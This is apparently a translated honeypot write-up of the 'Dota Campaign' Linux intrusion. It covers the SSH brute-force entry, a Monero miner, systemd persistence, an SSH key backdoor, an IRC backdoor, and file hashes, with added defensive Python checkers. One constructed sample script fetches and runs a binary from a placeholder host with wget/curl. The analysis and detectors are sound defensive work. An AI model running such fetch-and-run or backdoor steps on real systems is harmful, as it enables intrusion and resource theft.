2025-01-18 Update From: SLTechnology News&Howtos shulou (Network Security)
Shulou (Shulou.com) 05/31 Report
Here I would like to share an example analysis of the Dota Campaign. Most readers probably do not know much about it yet, so this article is offered for reference; I hope you gain a lot from reading it, so let's go through it together!
Initial infection
I named the attack the "Dota Campaign" after the contents of the attack file. In this campaign, the attacker gained initial access to the target device via weak SSH credentials. My SSH honeypot uses salvatore as both username and password. Here is the initial login record from my SSH log:
After authenticating, the attacker immediately executed system commands over SSH; all of them were passed in as actual SSH commands. Since my system is a honeypot running a custom build of OpenSSH, we can see the commands the attacker executed:
First, the attacker sent an HTTP request to host 54.37.70[.]249 for a file named .x15cache, waited 10 seconds, and executed it. The attacker also changed the user's password to a random string. The .x15cache file contains the following:
From this, the .x15cache file appears to be just a dropper that sets up the environment; it also fetches other files from host 54.37.70[.]249. The second file, dota2.tar.gz, contains malicious code in a directory called .rsync. I used my file detection script to extract parts of the archive:
The .x15cache script changes into this .rsync directory and tries to execute the ./cron and ./anacron files. The attacker chained them with the "||" (or) operator, so ./cron runs first and ./anacron only runs if that fails. There is also a file in the .rsync directory that never seems to be run. Let's take a look at it:
The i686 architecture is for 32-bit environments and x86_64 for 64-bit ones, so cron is the 64-bit binary and anacron the 32-bit one. Running them confirmed this:
Since both files do the same thing, we only need to analyze one of them.
Analyzing the cron code
Let's start by gathering some basic information with the strings command; the "cryptonight" string caught my attention:
CryptoNight is a proof-of-work algorithm that runs well on ordinary PC CPUs but not on specialized mining hardware, so for the time being CryptoNight can only be mined with CPUs.
Knowing that it has something to do with mining, let's see what else the strings command can find:
Above is the help page of the xmrig command, a CPU miner for Monero. We also captured the compilation timestamp: May 3, 2019, i.e. the previous month.
Next, let's analyze the network traffic. We can see the code establish a connection to a new host, 5.255.86[.]129:80:
After running tcpdump to capture traffic, we analyzed it with Wireshark:
The client sends some JSON data to the server, including an XMRig parameter and a cn parameter (CryptoNight).
Attack Phase Two
In addition to the command above, the attacker runs another command a few seconds later:
This time the attacker's working directory was /dev/shm, and the rp and .satan files were downloaded from the previous host, 54.37.70[.]249. Next, the attacker attempts to run sudo to gain root privileges and then runs the .satan script as root. The .satan file reads:
The .satan script first creates a system service called srsync and sets it to run automatically. The srsync service calls the script /usr/local/bin/srsync.sh, and srsync.sh in turn runs the Perl script rsync.pl as well as the ps.bin code file. The rsync.pl script, from /dev/shm/rp, is delivered from the server together with the .satan script and uses wget to retrieve the ps.bin code file (from host 54.37.70[.]249). Note that in malicious mining software, attackers commonly use curl as a fallback for wget.
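A host-side check for the persistence chain just described, written as an added example (not code from the article or from the malware): it parses a systemd unit, flags an ExecStart outside the usual package locations, and scans the launcher script for the /dev/shm staging, wget/curl download and perl execution described above. The unit text, the launcher script and the EXAMPLE-HOST placeholder are constructed, since the page does not reproduce the real files.

```python
"""Flag systemd services that launch from unusual paths, like the srsync persistence above."""
import re

# Constructed sample unit, modelled on the srsync service the .satan script installs
# (the real unit file is not reproduced in the article).
SAMPLE_UNIT = """[Unit]
Description=srsync
[Service]
ExecStart=/usr/local/bin/srsync.sh
[Install]
WantedBy=multi-user.target
"""
# Constructed launcher with the behaviour described (stage in /dev/shm, wget with curl fallback, perl, ps.bin); EXAMPLE-HOST is a placeholder.
SAMPLE_SCRIPT = """#!/bin/sh
cd /dev/shm
wget -q http://EXAMPLE-HOST/ps.bin || curl -sO http://EXAMPLE-HOST/ps.bin
perl /dev/shm/rp &
/dev/shm/ps.bin
"""
# Locations a distribution-packaged service rarely executes from.
UNUSUAL_EXEC_DIRS = ("/usr/local/bin/", "/dev/shm/", "/tmp/", "/var/tmp/", "/home/")
SCRIPT_MARKERS = {"stages in /dev/shm": r"/dev/shm", "downloads with wget/curl": r"\b(wget|curl)\b",
                  "runs perl": r"\bperl\b"}

def parse_unit(text: str) -> dict:
    """Parse an INI-style unit into {section: {key: value}} (a repeated key keeps the last value)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections

def exec_path(unit: dict) -> str:
    """Executable named in ExecStart, minus systemd prefix characters (-, @, :, +, !) and arguments."""
    cmd = unit.get("Service", {}).get("ExecStart", "").strip()
    return cmd.split()[0].lstrip("-@:+!") if cmd else ""

def review(unit_text: str, script_text: str) -> list:
    """Findings for one unit plus the script it launches; an empty list means nothing odd."""
    path = exec_path(parse_unit(unit_text))
    findings = [f"ExecStart runs from unusual location: {path}"] if path.startswith(UNUSUAL_EXEC_DIRS) else []
    findings += [f"launcher {label}" for label, pat in SCRIPT_MARKERS.items() if re.search(pat, script_text)]
    return findings
```

On a live host the same functions can be fed each unit under /etc/systemd/system together with the script its ExecStart names.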
Analyzing the ps.bin file
After a brief analysis, I found that ps.bin is actually a 32-bit code file:
After searching with strings, I found that the code mentioned ssh, so I searched for "ssh" with grep:
The first thing I noticed was a system command that adds an RSA key to the ~/authorized_keys file, which is essentially an SSH backdoor: the attacker can then authenticate to the account with the corresponding RSA private key. I also found a lot of ssh-related content, which turned out to be function names:
In this case, we are dealing with a pure SSH backdoor.
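An audit of authorized_keys against an inventory of known key fingerprints, as an added example (not the article's code): it handles the optional options prefix, computes the SHA256 fingerprint in the form ssh-keygen -l prints, and reports any key that is not on the allowlist, such as an RSA key appended by the backdoor described above. The key blobs and file content are constructed and are not real keys.

```python
"""Audit authorized_keys entries against an allowlist of known key fingerprints."""
import base64
import hashlib
import re

# Line format: [options] keytype blob [comment]; options may contain quoted spaces, so anchor on the key type.
KEY_RE = re.compile(r"(ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)")


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (what ssh-keygen -l prints)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_line(line: str):
    """Return (options, keytype, blob, comment), or None for blank, comment or malformed lines."""
    line = line.strip()
    m = KEY_RE.search(line) if line and not line.startswith("#") else None
    if not m:
        return None
    return line[: m.start()].strip(), m.group(1), m.group(2), line[m.end():].strip()


def audit(text: str, allowlist: set) -> list:
    """Return (line_no, fingerprint, reason) for every key that is not in the allowlist."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        _options, keytype, blob, comment = parsed
        fp = fingerprint(blob)
        if fp not in allowlist:
            findings.append((no, fp, f"unknown {keytype} key, comment {comment!r}"))
    return findings


# Constructed blobs (not real keys): base64 of arbitrary bytes is enough to exercise the code.
KNOWN_BLOB = base64.b64encode(b"constructed admin key blob").decode()
ROGUE_BLOB = base64.b64encode(b"constructed attacker key blob").decode()
ALLOWLIST = {fingerprint(KNOWN_BLOB)}  # in practice: fingerprints from your key inventory

# Constructed file: one legitimate restricted entry, then an appended RSA key of the kind the backdoor adds.
SAMPLE_AUTHORIZED_KEYS = f"""# admin key
from="10.0.0.0/8",no-agent-forwarding ssh-ed25519 {KNOWN_BLOB} admin@bastion
ssh-rsa {ROGUE_BLOB} root@localhost
"""
```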
Code analysis
First, let's look at the IP address in the backdoor code:
And the variable names are obviously Spanish, emmmm...
Next, locate the main loop of the software:
It is mainly responsible for continuously listening for commands sent by the IRC server. The parse function determines the content of each command:
I also noticed a call to a shell function:
$comando refers to the system command; this appears to be a second backdoor, one based on IRC channels. We can view the channel connection and setup with the netstat command:
With tcpdump running, run the Perl script and analyze the traffic in Wireshark. The complete TCP stream is shown below:
This is standard IRC traffic: the client keeps trying to obtain a username, and once it succeeds it joins the ##root channel; the server reports it was created on May 7, 2019.
It is worth mentioning that part of a DoS attack code seems to be embedded in it as well:
Intrusion threat indicators (IoC), file hashes (MD5):
.satan: 36e692c1e58b53f54ae4966d15fdfa84
rsync.pl: 52a422722c479d8c5483d2db9267e4cd
ps.bin: 04d0658afae3ea7b0fdaf6a519f2e28c
dota2.tar.gz: 2cfb1ad304940ae7e3af954d5c1d1363
.x15cache: 6d6fb279bb78b25413a441e4bfd3ded9
cron: fdb085727694e327c8758061a224166b
anacron: 2c15d9bcd208c9446b14452d25d9ca84
That concludes the "Dota Campaign Sample Analysis"; thank you for reading. I hope it has given everyone some understanding of the campaign and that the content shared here is useful.